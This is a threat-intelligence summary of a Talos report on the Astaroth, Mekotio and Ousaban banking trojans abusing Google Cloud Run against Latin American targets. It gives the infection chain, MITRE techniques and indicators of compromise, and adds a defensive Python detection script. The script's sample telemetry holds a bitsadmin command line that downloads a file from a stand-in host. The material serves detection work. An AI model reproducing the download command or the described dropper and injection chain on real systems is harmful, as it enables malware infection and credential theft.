Astaroth, Mekotio & Ousaban abusing Google Cloud Run in LATAM-focused malware campaigns

Google Cloud Run has been abused to host high-volume distribution infrastructure that redirects victims to Google Cloud Storage ZIPs or serves malicious MSI installers directly, delivering banking trojans Astaroth (Guildma), Mekotio and Ousaban primarily to Latin American targets. The infection chains use MSIs as droppers (embedded JavaScript or binary streams), Bitsadmin for stage retrieval, AutoIt-based loaders and process injection into regsvcs.exe, with C2 over Ngrok/TCP and region-based cloaking. #Astaroth #Mekotio #Ousaban #GoogleCloudRun

Keypoints

  • Adversaries leverage Google Cloud Run URLs (run[.]app) to host or redirect to malicious payloads, massively increasing distribution since Sept 2023.
  • Astaroth, Mekotio and Ousaban are being delivered via malicious MSIs — Astaroth MSIs embed JavaScript, Mekotio MSIs include malicious DLL streams and a CAB archive.
  • Delivery often uses a 302 redirect from Cloud Run to storage[.]googleapis[.]com ZIP archives containing MSI files; some Cloud Run services also serve MSIs directly.
  • Stage retrieval relies on Bitsadmin (LoLBin) to download AutoIt binaries, compiled AutoIt scripts, sqlite3.dll and an XOR-encoded Ousaban blob (key 0x2A).
  • AutoIt-based loader decodes embedded payload (sdk.log), injects the final Astaroth payload into regsvcs.exe, establishes persistence via Startup LNK and exfiltrates credentials (including crypto exchanges).
  • Mekotio extracts CAB contents to %PROGRAMDATA% (libeay32.dll, ssleay32.dll, text file), then executes a DLL export; final Mekotio is Delphi + VMProtect and uses geolocation filtering via ipinfo.
  • Campaigns use cloaking (geolocation/proxy/crawler checks), Ngrok for C2 (1.tcp.sa.ngrok.io:26885) and variable C2 ports; distribution artifacts and hashes are published in the report.

MITRE Techniques

  • [T1566] Phishing – Malspam themes and lures used to deliver URLs (email subjects: invoices/tax documents): ‘these emails are being sent using themes related to invoices or financial and tax documents’
  • [T1102] Web Service – Use of Google Cloud Run to host redirectors and payloads: ‘victims are redirected to the Cloud Run web services deployed by the threat actors’
  • [T1105] Ingress Tool Transfer – Redirects to Google Cloud Storage ZIPs and direct delivery of MSI installers: ‘responds with a 302 redirect to a file location within Google Cloud … delivery of a ZIP archive containing a malicious MSI.’
  • [T1218] Signed Binary Proxy Execution – Abuse of Bitsadmin (LoLBin) to download next-stage components: ‘uses the Bitsadmin living-off-the-land binary (LoLBin) to retrieve the next-stage components’
  • [T1059] Command and Scripting Interpreter – Embedded JavaScript inside MSI (CustomAction.idt) and use of cmd.exe for file creation/execution: ‘embedded JavaScript that has been placed into the CustomAction.idt file’
  • [T1055] Process Injection – Loader injects final Astaroth payload into a legitimate process (regsvcs.exe) in memory: ‘injects the final Astaroth payload into this process in memory’
  • [T1547.001] Boot or Logon Autostart Execution: Startup Folder – Persistence via a LNK in the Startup menu that launches the AutoIt binary: ‘establishes persistence using a LNK file in the Startup menu’
  • [T1071] Application Layer Protocol – C2 communications over TCP via Ngrok and TLS-over-TCP to remote servers: ‘communicates with C2 using Ngrok (1.tcp.sa.ngrok.io) over TCP/26885’

Indicators of Compromise

  • [Domain] distribution/redirect hosts – arr-wd3463btrq-uc.a.run.app, portu-wd3463btrq-uc.a.run.app, and many other run.app domains (see report for full list)
  • [URL] direct payload locations – hxxps://storage[.]googleapis[.]com/alele/FAT.1705617082.zip, hxxps://storage[.]googleapis[.]com/alele/Fat.184949849.zip
  • [IP] hosting/distribution server – 34[.]135[.]1[.]100 (observed as host for distribution URLs during analysis)
  • [Hashes SHA256] observed malware/artifact hashes – 4fa9e718fca1fa299beab1b5fea500a0e63385b5fe6d4eb1b1001f2abd97a828 (Mekotio MSI ZIP), 8d912a99076f0bdc4fcd6e76c51a1d598339c1502086a4381f5ef67520a0ddf2 (Astaroth MSI ZIP), and other hashes
  • [File names] installer and payload filenames – CustomAction.idt (embedded JS), sdk.log (Astaroth encoded payload), Oculus.Toshiba.01997.5591.272.exe (AutoIt binary name) and other working filenames

The technical infection flow and procedures, condensed:

Email campaigns deliver Google Cloud Run (run.app) URLs that either serve MSIs directly or issue 302 redirects to storage[.]googleapis[.]com ZIP archives containing malicious MSI installers. The MSIs act as initial droppers: Astaroth MSIs include obfuscated JavaScript embedded in CustomAction.idt which, when executed, fetches an obfuscated JScript from attacker-controlled servers; Mekotio MSIs carry embedded DLL binary streams and a disk1.cab whose contents (libeay32.dll, ssleay32.dll and a text file) are extracted to %PROGRAMDATA%, after which a DLL export is executed.

The retrieved JScript/launcher uses cmd.exe to create working directories and then leverages the Bitsadmin LoLBin to download next-stage components (AutoIt3.exe, a compiled AutoIt script, sqlite3.dll and, for Ousaban, a PE blob XOR-encoded with key 0x2A). The compiled AutoIt script contains a hex blob (DLL loader) that writes and decodes sdk.log (the Astaroth payload) or the Ousaban PE, starts regsvcs.exe and injects the decoded Astaroth payload into that process. Persistence is achieved by dropping a .lnk in the Startup folder that invokes the AutoIt binary, and the malware collects credentials (including crypto exchanges), screenshots and keystrokes. C2 uses Ngrok (1.tcp.sa.ngrok.io:26885) or TLS-over-TCP (e.g., TCP/8088), while Mekotio additionally performs IP geolocation checks (ipinfo) to enforce regional filtering before proceeding to C2 communication.
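Detection logic for the chain above, written as an added example (not code from the Talos report): four checks run over constructed sample telemetry covering the run.app 302 to a GCS ZIP, Bitsadmin dropping a file into a user-writable path, regsvcs.exe launched by a binary in a user path, and regsvcs.exe connecting to an Ngrok TCP tunnel. The event field names, the Windows paths and the command lines are assumptions; only the run.app host, the GCS URL, the AutoIt binary name and the Ngrok endpoint come from the report.

```python
import re

# Constructed sample telemetry shaped like a simplified proxy/EDR export. The run.app
# host, GCS ZIP URL, AutoIt binary name and Ngrok endpoint are from the report; the
# other paths, command lines and hosts are assumed for illustration.
SAMPLE_EVENTS = [
    {"type": "http", "host": "arr-wd3463btrq-uc.a.run.app", "status": 302,
     "location": "https://storage.googleapis.com/alele/FAT.1705617082.zip"},
    {"type": "http", "host": "docs.example.invalid", "status": 200, "location": ""},
    {"type": "process", "image": r"C:\Windows\System32\bitsadmin.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"bitsadmin /transfer j /download /priority high http://example.invalid/a "
                r"C:\Users\Public\Oculus.Toshiba.01997.5591.272.exe"},
    {"type": "process", "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe",
     "parent": r"C:\Users\Public\Oculus.Toshiba.01997.5591.272.exe", "cmdline": "regsvcs.exe"},
    {"type": "network", "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe",
     "dest": "1.tcp.sa.ngrok.io", "port": 26885},
]

USER_WRITABLE = re.compile(r"C:\\(Users|ProgramData)\\", re.I)  # where LoLBins should not drop files
GCS_ZIP = re.compile(r"^https://storage\.googleapis\.com/.+\.zip$", re.I)

def cloudrun_redirect_to_gcs_zip(e):
    """A *.run.app service answering 302 with a ZIP on Google Cloud Storage."""
    return (e["type"] == "http" and e["status"] == 302
            and e["host"].lower().endswith(".run.app")
            and GCS_ZIP.match(e["location"]) is not None)

def bitsadmin_download_to_user_path(e):
    """bitsadmin.exe used as a LoLBin to fetch a file into a user-writable directory."""
    return (e["type"] == "process" and e["image"].lower().endswith("\\bitsadmin.exe")
            and "/download" in e["cmdline"].lower()
            and USER_WRITABLE.search(e["cmdline"]) is not None)

def regsvcs_with_unexpected_parent(e):
    """regsvcs.exe (the injection target) started by a binary in a user-writable directory."""
    return (e["type"] == "process" and e["image"].lower().endswith("\\regsvcs.exe")
            and USER_WRITABLE.match(e["parent"]) is not None)

def regsvcs_to_ngrok_tcp(e):
    """regsvcs.exe opening a connection to an Ngrok TCP tunnel endpoint (the reported C2)."""
    return (e["type"] == "network" and e["image"].lower().endswith("\\regsvcs.exe")
            and e["dest"].lower().endswith(".tcp.sa.ngrok.io"))

RULES = [cloudrun_redirect_to_gcs_zip, bitsadmin_download_to_user_path,
         regsvcs_with_unexpected_parent, regsvcs_to_ngrok_tcp]

def scan(events):
    """Return (rule name, event) pairs for every event that matches a rule, in event order."""
    return [(r.__name__, e) for e in events for r in RULES if r(e)]
```

Because run.app, storage.googleapis.com and Ngrok are legitimate services, the rules key on the combination (a 302 to a ZIP, the parent that launched regsvcs.exe, the process that opens the tunnel) rather than on the domains alone.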

Read more: https://blog.talosintelligence.com/google-cloud-run-abuse/